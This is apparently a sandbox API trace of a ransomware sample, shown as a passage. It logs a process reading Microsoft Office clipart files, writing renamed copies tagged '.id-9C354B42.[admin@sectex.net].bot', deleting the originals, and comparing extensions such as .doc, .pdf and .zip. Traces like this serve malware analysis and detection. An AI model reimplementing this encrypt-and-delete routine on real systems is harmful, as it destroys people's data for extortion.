	[0169.115] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1330, lpOverlapped=0x0) returned 1
	[0169.116] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.116] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.116] SetEndOfFile (hFile=0x3ac) returned 1
	[0169.117] CloseHandle (hObject=0x3ac) returned 1
	[0169.117] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.117] SetEndOfFile (hFile=0x3d0) returned 1
	[0169.119] CloseHandle (hObject=0x3d0) returned 1
	[0169.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.119] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf")) returned 1
	[0169.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.120] lstrlenW (lpString=".doc") returned 4
	[0169.120] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.120] lstrlenW (lpString=".docx") returned 5
	[0169.120] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.120] lstrlenW (lpString=".pdf") returned 4
	[0169.120] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.120] lstrlenW (lpString=".xls") returned 4
	[0169.120] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.120] lstrlenW (lpString=".xlsx") returned 5
	[0169.120] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.120] lstrlenW (lpString=".ppt") returned 4
	[0169.120] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.120] lstrlenW (lpString=".zip") returned 4
	[0169.120] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.120] lstrlenW (lpString=".rar") returned 4
	[0169.120] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.120] lstrlenW (lpString=".bz2") returned 4
	[0169.120] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.120] lstrlenW (lpString=".7z") returned 3
	[0169.120] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.120] lstrlenW (lpString=".dbf") returned 4
	[0169.120] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.120] lstrlenW (lpString=".1cd") returned 4
	[0169.120] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.121] lstrlenW (lpString=".jpg") returned 4
	[0169.121] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.121] lstrlenW (lpString=".doc") returned 4
	[0169.121] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString=".docx") returned 5
	[0169.121] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.121] lstrlenW (lpString=".pdf") returned 4
	[0169.121] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString=".xls") returned 4
	[0169.121] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.121] lstrlenW (lpString=".xlsx") returned 5
	[0169.121] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.121] lstrlenW (lpString=".ppt") returned 4
	[0169.121] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.121] lstrlenW (lpString=".zip") returned 4
	[0169.121] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.121] lstrlenW (lpString=".rar") returned 4
	[0169.121] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString=".bz2") returned 4
	[0169.121] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString=".7z") returned 3
	[0169.121] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.121] lstrlenW (lpString=".dbf") returned 4
	[0169.121] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.121] lstrlenW (lpString=".1cd") returned 4
	[0169.121] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 63
	[0169.122] lstrlenW (lpString=".jpg") returned 4
	[0169.122] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.122] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.122] lstrlenW (lpString="J0152716.WMF") returned 12
	[0169.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.122] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4580) returned 1
	[0169.122] CloseHandle (hObject=0x3d0) returned 1
	[0169.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf")) returned 0x20
	[0169.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.123] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.123] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0169.124] GetLastError () returned 0x0
	[0169.124] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x11e4, lpOverlapped=0x0) returned 1
	[0169.134] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x11f0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x11f0, lpOverlapped=0x0) returned 1
	[0169.136] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.136] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.136] SetEndOfFile (hFile=0x3ac) returned 1
	[0169.136] CloseHandle (hObject=0x3ac) returned 1
	[0169.136] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.136] SetEndOfFile (hFile=0x3d0) returned 1
	[0169.138] CloseHandle (hObject=0x3d0) returned 1
	[0169.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.139] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf")) returned 1
	[0169.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.139] lstrlenW (lpString=".doc") returned 4
	[0169.139] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.139] lstrlenW (lpString=".docx") returned 5
	[0169.139] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.139] lstrlenW (lpString=".pdf") returned 4
	[0169.140] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString=".xls") returned 4
	[0169.140] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.140] lstrlenW (lpString=".xlsx") returned 5
	[0169.140] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.140] lstrlenW (lpString=".ppt") returned 4
	[0169.140] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.140] lstrlenW (lpString=".zip") returned 4
	[0169.140] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.140] lstrlenW (lpString=".rar") returned 4
	[0169.140] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString=".bz2") returned 4
	[0169.140] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString=".7z") returned 3
	[0169.140] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.140] lstrlenW (lpString=".dbf") returned 4
	[0169.140] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.140] lstrlenW (lpString=".1cd") returned 4
	[0169.140] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.140] lstrlenW (lpString=".jpg") returned 4
	[0169.140] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.140] lstrlenW (lpString=".doc") returned 4
	[0169.140] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString=".docx") returned 5
	[0169.140] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0169.140] lstrlenW (lpString=".pdf") returned 4
	[0169.140] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.140] lstrlenW (lpString=".xls") returned 4
	[0169.141] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.141] lstrlenW (lpString=".xlsx") returned 5
	[0169.141] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0169.141] lstrlenW (lpString=".ppt") returned 4
	[0169.141] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.141] lstrlenW (lpString=".zip") returned 4
	[0169.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.141] lstrlenW (lpString=".rar") returned 4
	[0169.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.141] lstrlenW (lpString=".bz2") returned 4
	[0169.141] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.141] lstrlenW (lpString=".7z") returned 3
	[0169.141] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.141] lstrlenW (lpString=".dbf") returned 4
	[0169.141] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.141] lstrlenW (lpString=".1cd") returned 4
	[0169.141] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 63
	[0169.141] lstrlenW (lpString=".jpg") returned 4
	[0169.141] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.141] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.141] lstrlenW (lpString="J0152722.WMF") returned 12
	[0169.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.142] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=7020) returned 1
	[0169.142] CloseHandle (hObject=0x3d0) returned 1
	[0169.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf")) returned 0x20
	[0169.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.142] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.143] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0169.143] GetLastError () returned 0x0
	[0169.143] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1b6c, lpOverlapped=0x0) returned 1
	[0169.146] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1b70, lpOverlapped=0x0) returned 1
	[0169.147] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.147] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.147] SetEndOfFile (hFile=0x3ac) returned 1
	[0169.147] CloseHandle (hObject=0x3ac) returned 1
	[0169.147] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.147] SetEndOfFile (hFile=0x3d0) returned 1
	[0169.149] CloseHandle (hObject=0x3d0) returned 1
	[0169.149] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.150] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152722.wmf")) returned 1
	[0169.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.150] lstrlenW (lpString=".doc") returned 4
	[0169.150] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.150] lstrlenW (lpString=".docx") returned 5
	[0169.150] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.150] lstrlenW (lpString=".pdf") returned 4
	[0169.150] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString=".xls") returned 4
	[0169.151] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.151] lstrlenW (lpString=".xlsx") returned 5
	[0169.151] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.151] lstrlenW (lpString=".ppt") returned 4
	[0169.151] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.151] lstrlenW (lpString=".zip") returned 4
	[0169.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.151] lstrlenW (lpString=".rar") returned 4
	[0169.151] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString=".bz2") returned 4
	[0169.151] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString=".7z") returned 3
	[0169.151] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.151] lstrlenW (lpString=".dbf") returned 4
	[0169.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.151] lstrlenW (lpString=".1cd") returned 4
	[0169.151] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.151] lstrlenW (lpString=".jpg") returned 4
	[0169.151] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.151] lstrlenW (lpString=".doc") returned 4
	[0169.151] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString=".docx") returned 5
	[0169.151] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0169.151] lstrlenW (lpString=".pdf") returned 4
	[0169.151] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.151] lstrlenW (lpString=".xls") returned 4
	[0169.151] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.152] lstrlenW (lpString=".xlsx") returned 5
	[0169.152] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0169.152] lstrlenW (lpString=".ppt") returned 4
	[0169.152] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.152] lstrlenW (lpString=".zip") returned 4
	[0169.152] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.152] lstrlenW (lpString=".rar") returned 4
	[0169.152] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.152] lstrlenW (lpString=".bz2") returned 4
	[0169.152] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.152] lstrlenW (lpString=".7z") returned 3
	[0169.152] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.152] lstrlenW (lpString=".dbf") returned 4
	[0169.152] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.152] lstrlenW (lpString=".1cd") returned 4
	[0169.152] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 63
	[0169.152] lstrlenW (lpString=".jpg") returned 4
	[0169.152] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.152] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.152] lstrlenW (lpString="J0152878.WMF") returned 12
	[0169.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0169.160] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=14888) returned 1
	[0169.160] CloseHandle (hObject=0x3b8) returned 1
	[0169.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf")) returned 0x20
	[0169.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0169.162] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.162] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152878.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0169.163] GetLastError () returned 0x0
	[0169.163] ReadFile (in: hFile=0x3b8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3a28, lpOverlapped=0x0) returned 1
	[0169.165] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3a30, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3a30, lpOverlapped=0x0) returned 1
